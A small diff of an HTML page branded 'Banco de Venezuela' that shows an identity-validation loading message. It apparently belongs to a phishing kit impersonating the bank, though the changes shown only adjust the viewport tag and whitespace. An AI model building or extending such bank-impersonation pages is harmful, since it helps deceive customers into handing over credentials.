--- a/cargando2.html
+++ b/cargando2.html
@@ -1,9 +1,11 @@
-
 <!DOCTYPE html>
 <html lang="es">
   <head>
     <meta charset="UTF-8" />
-    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+    <meta
+      name="viewport"
+      content="width=device-width, initial-scale=1.0, user-scalable=no"
+    />
     <title>Banco de Venezuela</title>
     <style>
       body {
@@ -189,7 +191,7 @@
             "
           >
             Estamos validando tu identidad. <br />
-            
+
             <br />
             <br />
             <label style="color: black"
